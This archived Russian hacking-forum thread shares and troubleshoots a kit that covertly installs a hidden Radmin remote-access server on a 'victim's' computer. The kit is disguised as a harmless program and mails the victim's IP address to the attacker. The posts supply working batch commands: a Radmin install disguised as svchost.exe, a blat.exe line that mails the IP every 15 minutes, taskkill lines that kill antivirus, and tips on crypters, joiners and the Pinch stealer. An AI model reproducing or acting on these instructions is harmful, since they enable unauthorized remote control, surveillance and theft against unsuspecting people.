Просмотр полной версии : Скрытый радмин + скрытая установка + ip на почту
Сборка от меня для тех кому лень перечитывать сотни страниц фака по этой теме.
Все файлы надо добавить в SFX архив и в свойствах указать выполнить после распаковки install.bat
далее при запуски архива...вы не увидите ничего)Это работа утилиты CMDow которая запускает cmd в скрытом режиме.
что же происходит в данный момент?
архив распаковывает файлы файлы для радмина копирует в windows, файлы почтовой утилиты в windows\system32\ , добавляет записи в реестре чтобы радминсервер не было видно,чтоб не ругался виндфаерволл, запускает радминсервер , и отдаёт команду на отсылку ip на ваш почтовый адрес.
после того,как программа выполнится,все распакованные файлы удаляются.
Как пользоваться?
В файле install.bat надо прописать адрес логин и пароль вашей почты,а так же строку с паролем от радмина (по умолчанию пароля нет).далее создаём самораспаковывающийся архив, и кидаем его жертве.
Чтобы не было так паливно,можно прописать в install.bat удаление самого архива и запуск какой-нибудь проги,установщик которой вы добавите в архив,например "Взлом_Вконтакте.exe"
Дописывайте,корректируйте под свои нужды,я лишь выкладываю основу,далее всё зависит от вашей фантазии
P.S. готовый sfx архив не возможно передать по почте,говорит найден вирус)как это обойти,каждый додумывается сам.
http://www.filehoster.ru/files/bx3443
никаких вирусов там нет,архив обычный
cremator (c)
05.01.2009, 01:47
Кто тестил?
использование батников палится антивирусниками... имхо - этот способ устарел с тех пор, как ушла из жизни винда 95/98, поэтому см пост http://forum.antichat.ru/showpost.php?p=1041809&postcount=227
незнаю,всё проверил,каспер непалит,только вот ип на почту неприходит)) а тк у нас тут у всех ип динамический,приходится каждый раз просить прислать картинку в аське))))) есть какойнить способ узнать ип удаленно?
stopxaker
07.01.2009, 19:13
незнаю,всё проверил,каспер непалит,только вот ип на почту неприходит)) а тк у нас тут у всех ип динамический,приходится каждый раз просить прислать картинку в аське))))) есть какойнить способ узнать ип удаленно?
есть способ , я делаю так : радмин (моя сборка) +pinch, этот радмин перебивает уже установленный радмин на мой пароль и не виден в трее , что очень удобно .
2 qazer способ устарел , протестил на 6 компах везде палево , опять же говорю радмин (моя сборка) +pinch+криптор+джойнер и будет всё very good ;)
2 qazer а то что писал +
У меня сейчас заказ: создать сборку, в которой отправка IP жертвы будет производиться на номер ICQ. Выложу позже на Плати.ру - кто захочет, тот приобритет.
Спросите почему платно? Отвечу: после изменений в протоколе icq (ведь все обновляли квип до 8080? кто обновлял - поймет меня) довольно трудно написать что-то работающее, чтобы оно отправляло что-то куда-то (я использую делфи 7й версии)
так не понял, как отправляет на почту IP ? SMTP (25 Порт?)? а если стоит файрвол и у клиента нет аутлук ? (например у меня не стоит никакого почтового клиента).
там в сборке консольный почтовый клиент есть,который всё и отправляет юкстати там в настройках указан альтернативный порт (можно переделать на 25ый)
stopxaker
08.01.2009, 20:28
У меня сейчас заказ: создать сборку, в которой отправка IP жертвы будет производиться на номер ICQ. Выложу позже на Плати.ру - кто захочет, тот приобритет.
Спросите почему платно? Отвечу: после изменений в протоколе icq (ведь все обновляли квип до 8080? кто обновлял - поймет меня) довольно трудно написать что-то работающее, чтобы оно отправляло что-то куда-то (я использую делфи 7й версии)
Я приобрету без разговора , давно уже юзаю твои сборки , доволен :)
оффтоп 2 ex3me стукнул в аську ;)
молодчага!!давно таким занималсь!все еще актуально!
stratocaster
18.01.2009, 01:02
Кто нить тестил? А то я нуб и оажется что это вдруг еще не работает, а если это работает - буду рабираться, отзовитесь кто тестил
Вы, конечно, прости, но я не нашел, где в настройках Архива определлый файл выполнить =\
делаешь sfx архив там на вкладке дополнительно есть строчка после распаковки выполнить и пишешь туда имя файла
Shadow6120
21.01.2009, 23:28
А ни у кого нет подобной сборки только где радмин 3.*? А то висту срочно ломануть надо :)
В файле install.bat надо прописать адрес логин и пароль вашей почты,а так же строку с паролем от радмина (по умолчанию пароля нет).далее создаём самораспаковывающийся архив, и кидаем его жертве. в какой именно строки надо прописать пароли от радмина?и как?
Я добавил пароль к радмину такой командой:
"%SYSTEMROOT%/svchost.exe" /save /silence /pass:тут_пишешь_пароль /port:тут_пишешь_порт
Пишешь эту команду сразу после строчки
"%SYSTEMROOT%/help/Tours/mmTour/svchost.exe" /install /silence
Но почта не работает. Может быть это связано с тем, что я юзаю gmail.com, а у них защищенное TSL соеденение?
жалко что она одноразовая.....
Scripter
06.02.2009, 22:08
в какой именно строки надо прописать пароли от радмина?и как?
либо в реестре
Hackser68
06.02.2009, 22:20
люди чёто я не вьехал обьясните дурачку как настроить?
stopxaker
07.02.2009, 06:13
люди чёто я не вьехал обьясните дурачку как настроить?
Для дурачков , вот человек написал готовый скрытый радмин всё в одном флаконе !
http://forum.antichat.ru/threadnav101461-1-10.html
если тема ешо актуална для тех которие не разобрались с отсиланиам почты
в етои строке убираити вконтсе точку blat.exe %systemroot%/system32/ip.txt -to вашапочта@yandex.ru.
+ делаити фаил ip.bat с вашаи сторчкой ( с вашаи почтаи на которую будит отсилат ) прописиваити ево в install.bat
copy /y "ip.bat" "%SYSTEMROOT%/system32/ip.bat"
тогда вам на почту каждие 15 минут будит приходит ip
Svist2008
06.04.2009, 19:08
Чтобы не было так паливно,можно прописать в install.bat удаление самого архива и запуск какой-нибудь проги,установщик которой вы добавите в архив,например "Взлом_Вконтакте.exe"
Подскажите плиз, что прописать в батнике, чтобы удалился сам SFX архив.
Спасибо.
Чтобы не было так паливно,можно прописать в install.bat удаление самого архива и запуск какой-нибудь проги,установщик которой вы добавите в архив,например "Взлом_Вконтакте.exe"
Подскажите плиз, что прописать в батнике, чтобы удалился сам SFX архив.
Спасибо.
а в самом SFX прописать никак что ли
Svist2008
06.04.2009, 19:36
а в самом SFX прописать никак что ли
____________________________________________
А разве там есть такая функция?
Svist2008
07.04.2009, 11:15
Народ, так кто нибудь подскажет, что прописать в батнике, что бы после распаковки SFX архива этот же архив удалился?
А разве там есть такая функция?
есть ..
Svist2008
07.04.2009, 11:50
есть ..
Ты оказывается ещё хуже меня с компом знаком!
Там такой функции нет и быт не может!!!!!!!!!!!!!
напиши команду после распоковки или в батнике "del sfx.exe" (без кавычек)
Svist2008
07.04.2009, 13:18
напиши команду после распоковки или в батнике "del sfx.exe" (без кавычек)
Нет, не получается, не удаляетя такой командой при распаковки архив SFX :mad:
Reptiliy
15.04.2009, 00:34
Ребят не подскажите как мне узнать пароль от его мыла ? Короче закинул я жертве скрытый Radmin приконектился хотел закинуть трояна через радмин но начал закидывать там антивирус закричал как мне через телнет его выключить ? у него стоит антивирус Sumantec AntiVirus
blood150
15.04.2009, 07:08
Ребят не подскажите как мне узнать пароль от его мыла ? Короче закинул я жертве скрытый Radmin приконектился хотел закинуть трояна через радмин но начал закидывать там антивирус закричал как мне через телнет его выключить ? у него стоит антивирус Sumantec AntiVirus
узнай под каким именем Sumantec AntiVirus в диспетчере задач в процессах отоброжается и сделай так:
taskkill /f /im название_процесса.exe
я закрывал нод 32 так: taskkill /f /im egui.exe
Reptiliy
15.04.2009, 10:09
blood150 а как узнать в диспечере задач как он отображаеца
drweb 5.0 видит в этом архиве RA и еще что-то не помню
Ребят не подскажите как мне узнать пароль от его мыла ? Короче закинул я жертве скрытый Radmin приконектился хотел закинуть трояна через радмин но начал закидывать там антивирус закричал как мне через телнет его выключить ? у него стоит антивирус Sumantec AntiVirus
Нелегче ли тебе скачать файлы с паролями и у себя их расшифровать. Антивирусы просто так не вырубишь.
Подскажите пожалуйста ньюбу, чем запаковать это всё великолепие в .exe файл...
Много гуглил... как то туго для меня это даётся...
Пробовал nBinder Limited но он что-то не хочет работать у меня : \
vilfenix
10.08.2009, 20:42
дайте батник плиз, который отсылает ip жертвы на мыло, желательно с таймерои, чтобы каждые пять минут присылал
очень нужно
Подскажите пожалуйста ньюбу, чем запаковать это всё великолепие в .exe файл...
Много гуглил... как то туго для меня это даётся...
Пробовал nBinder Limited но он что-то не хочет работать у меня : \
Quick Batch Compiler тебе поможет
где прописывать пасс? на радмин
не полящийся говоришь???
в процессах он числиться так же как и в строке где все программы/время
Штука хорошая, тока у иеня по началу батник палился антивиром. НО с этим я разобрался. А как сделать что бы это все чудо запускалось каждый раз при старте компа? Что бы айпи на мыло отсылал постоянно? :confused:
cheater_man
29.11.2009, 21:06
Штука хорошая, тока у иеня по началу батник палился антивиром. НО с этим я разобрался. А как сделать что бы это все чудо запускалось каждый раз при старте компа? Что бы айпи на мыло отсылал постоянно? :confused:
ip на мыло говоришь :) Ну обычно делают так что через заданный промежуток времени ip-шник шлется на ftp серв. Это проще легче реализовать. Можно вообще батничек написать! Блин это все дело мозга и прямых рук, так что сам вкдючай свой мозг :)
Надод, может кто обяснить или сделать что бы она в автозагрузку прописывалась?
cleric.80
22.05.2010, 15:53
Надод, может кто обяснить или сделать что бы она в автозагрузку прописывалась?
а что в ручную ? в папку автозагрузки никак не закинуть ?
только тот файл что открывает дверь, без ip sendera )) ато заипешься почту вычищать..)) наскок помню работало,
Кто нибудь перезалейте сабж пожалуйста...
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot